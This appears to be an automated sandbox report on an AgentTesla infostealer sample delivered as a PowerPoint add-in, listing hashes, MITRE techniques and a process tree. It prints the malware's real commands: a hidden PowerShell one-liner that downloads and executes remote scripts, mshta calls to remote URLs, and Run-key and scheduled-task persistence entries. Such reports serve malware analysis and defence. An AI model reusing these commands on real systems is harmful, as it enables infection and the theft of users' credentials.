agenttesla | 3ed7cb075765f5e5ab3d98021d4fdf3e81498709452af99a220f3f831fe46353

General

Target

Consignment Details.ppam
Size

5KB
MD5

f9d2f6aa2818e3650ad78eca52d06ad7
SHA1

c0c6c5e57968b372b30a939cc2db89b93acc99b1
SHA256

3ed7cb075765f5e5ab3d98021d4fdf3e81498709452af99a220f3f831fe46353
SHA512

86187429d31b9a6cfbc62b8ab5876a6ed76e8a15baa5bec9fd7bbd9d3b3642de8e598f7ad6727a0eb1a4da9963c974d23419baf3790548f9f05ec268256a2961

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2188	3016	mshta.exe	POWERPNT.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/944-314-0x000000000043755E-mapping.dmp	family_agenttesla
behavioral2/memory/1524-382-0x000000000043755E-mapping.dmp	family_agenttesla

Blocklisted process makes network request 14 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
30	2188	mshta.exe
31	2188	mshta.exe
33	2188	mshta.exe
35	2188	mshta.exe
37	2188	mshta.exe
39	2188	mshta.exe
44	2188	mshta.exe
46	2188	mshta.exe
47	2188	mshta.exe
49	2188	mshta.exe
52	2188	mshta.exe
53	2188	mshta.exe
54	2188	mshta.exe
56	1000	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

RegAsm.exejsc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1000 set thread context of 944	1000	powershell.exe	jsc.exe
PID 1000 set thread context of 1524	1000	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3840 schtasks.exe

pid	process
3840	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3708 taskkill.exe
3612 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3016 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exedw20.exejsc.exeRegAsm.exe

pid process

1000 powershell.exe
1780 dw20.exe
1780 dw20.exe
1000 powershell.exe
1000 powershell.exe
944 jsc.exe
944 jsc.exe
1524 RegAsm.exe
1524 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

jsc.exe

pid process

944 jsc.exe

pid	process
3708	taskkill.exe
3612	taskkill.exe

pid	process
3016	POWERPNT.EXE

pid	process
1000	powershell.exe
1780	dw20.exe
1780	dw20.exe
1000	powershell.exe
1000	powershell.exe
944	jsc.exe
944	jsc.exe
1524	RegAsm.exe
1524	RegAsm.exe

pid	process
944	jsc.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	3708	taskkill.exe
Token: SeDebugPrivilege	3612	taskkill.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeDebugPrivilege	944	jsc.exe
Token: SeDebugPrivilege	1524	RegAsm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

3016 POWERPNT.EXE
3016 POWERPNT.EXE
3016 POWERPNT.EXE
944 jsc.exe
1524 RegAsm.exe

pid	process
3016	POWERPNT.EXE
3016	POWERPNT.EXE
3016	POWERPNT.EXE
944	jsc.exe
1524	RegAsm.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 3016 wrote to memory of 2188	3016	POWERPNT.EXE	mshta.exe
PID 3016 wrote to memory of 2188	3016	POWERPNT.EXE	mshta.exe
PID 2188 wrote to memory of 3708	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 3708	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 3612	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 3612	2188	mshta.exe	taskkill.exe
PID 2188 wrote to memory of 3840	2188	mshta.exe	schtasks.exe
PID 2188 wrote to memory of 3840	2188	mshta.exe	schtasks.exe
PID 2188 wrote to memory of 1000	2188	mshta.exe	powershell.exe
PID 2188 wrote to memory of 1000	2188	mshta.exe	powershell.exe
PID 2188 wrote to memory of 1780	2188	mshta.exe	dw20.exe
PID 2188 wrote to memory of 1780	2188	mshta.exe	dw20.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 944	1000	powershell.exe	jsc.exe
PID 1000 wrote to memory of 984	1000	powershell.exe	csc.exe
PID 1000 wrote to memory of 984	1000	powershell.exe	csc.exe
PID 984 wrote to memory of 2060	984	csc.exe	cvtres.exe
PID 984 wrote to memory of 2060	984	csc.exe	cvtres.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe
PID 1000 wrote to memory of 1524	1000	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Consignment Details.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\SYSTEM32\mshta.exe
  mshta.exe https://www.bitly.com/kddjdkwodkkasodkdwii
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3708
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: SetClipboardViewer
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:944
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tsmdljfb\tsmdljfb.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:984
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2140.tmp" "c:\Users\Admin\AppData\Local\Temp\tsmdljfb\CSC16C3FA8A58254A27A0E0D17B95A17A42.TMP"
        5⤵
        
        PID:2060
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      outlook_office_path
      outlook_win_path
      PID:1524
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/13.html\""
    3⤵
    - Creates scheduled task(s)
    PID:3840
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    dw20.exe -x -s 2960
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1780

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2140.tmp

MD5
51bd570b035c277ca051efefa07ef702

SHA1
a27cb2fd250200e43f08ccd8e7a77b2fd10a03e9

SHA256
936c06317cc17d2a90c7fd4892802af25cd419557f962e603ea2fcc78a7cde82

SHA512
c6e9210dfba109345d061557fc010cf8d92ea73eb88528a5261919bbe67b98218ae267d5f61a8338c90c34e3999189743ea21e99a65d9c4d5804a78db6af06cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tsmdljfb\tsmdljfb.dll

MD5
a75a368395312bb1b2a1ba4ce2b0d95e

SHA1
b76b89660e24b0971091949961435dc2db2442dd

SHA256
86f7fc6fd0e4c4dfc035ef10a736e9f6c6b24fba4eb81ba754bb7b6c05b768a7

SHA512
7a5dfbf990da92340f33d2e32ee74eecc9899d49487369274d3d463f49f63fd3c6c4f600973f17a6b8ec9a9b730c39bd5e18221128971177e697a8c8ec9bf9cf

Download Submit
C:\Windows\system32\drivers\etc\hosts

MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tsmdljfb\CSC16C3FA8A58254A27A0E0D17B95A17A42.TMP

MD5
546300a20c6f1f5d58f01d6d38aa5b55

SHA1
4ed58e58157567d375d504892b2ef981e1a3b65d

SHA256
e1e46feb5c00e04ae58b48146c392c7ad5a1408ff23c52ef09f1cf2938fb8c7c

SHA512
2d09dedd60e7ca330fd1a723c0b3d5215316b84de26164ae4e7a9dabeb37ac9d4ab6a05f8a1b8af16ac8d11c1a0892734bd87ab22e22678a58e4bd41977a2195

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tsmdljfb\tsmdljfb.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tsmdljfb\tsmdljfb.cmdline

MD5
b60aab1ca47e5f21b3622aa37d759c70

SHA1
5f13f35b21b58fb98aa8b0603fa0ac4ce17f8547

SHA256
78d58713f6dd2818bc7880e2ca84c5aa800840c4aa5968d7c9728696717dde50

SHA512
1f3bd53c037b2686d1c15903a9b6ac0c0f4d04b7486a263776f248e488e79c75cb38f02adab98eb9f72a5d4064bdea1cabb84fe79c37c98addc2924bcbde9fca

Download Submit
memory/944-372-0x0000000004D70000-0x000000000526E000-memory.dmp

Filesize
5.0MB

Download
memory/944-399-0x0000000004D70000-0x000000000526E000-memory.dmp

Filesize
5.0MB

Download
memory/944-314-0x000000000043755E-mapping.dmp

Download
memory/984-373-0x0000000000000000-mapping.dmp

Download
memory/1000-307-0x0000016ECE756000-0x0000016ECE758000-memory.dmp

Filesize
8KB

Download
memory/1000-291-0x0000000000000000-mapping.dmp

Download
memory/1000-298-0x0000016ECE750000-0x0000016ECE752000-memory.dmp

Filesize
8KB

Download
memory/1000-299-0x0000016ECE753000-0x0000016ECE755000-memory.dmp

Filesize
8KB

Download
memory/1524-382-0x000000000043755E-mapping.dmp

Download
memory/1524-388-0x0000000002880000-0x0000000002881000-memory.dmp

Filesize
4KB

Download
memory/1524-398-0x0000000002881000-0x0000000002882000-memory.dmp

Filesize
4KB

Download
memory/1780-292-0x0000000000000000-mapping.dmp

Download
memory/2060-376-0x0000000000000000-mapping.dmp

Download
memory/2188-256-0x0000000000000000-mapping.dmp

Download
memory/3016-128-0x00007FFB85C90000-0x00007FFB85CA0000-memory.dmp

Filesize
64KB

Download
memory/3016-129-0x00007FFB85C90000-0x00007FFB85CA0000-memory.dmp

Filesize
64KB

Download
memory/3016-115-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp

Filesize
64KB

Download
memory/3016-122-0x0000020E3A470000-0x0000020E3A472000-memory.dmp

Filesize
8KB

Download
memory/3016-121-0x0000020E3A470000-0x0000020E3A472000-memory.dmp

Filesize
8KB

Download
memory/3016-120-0x0000020E3A470000-0x0000020E3A472000-memory.dmp

Filesize
8KB

Download
memory/3016-119-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp

Filesize
64KB

Download
memory/3016-118-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp

Filesize
64KB

Download
memory/3016-117-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp

Filesize
64KB

Download
memory/3016-116-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp

Filesize
64KB

Download
memory/3612-289-0x0000000000000000-mapping.dmp

Download
memory/3708-288-0x0000000000000000-mapping.dmp

Download
memory/3840-290-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads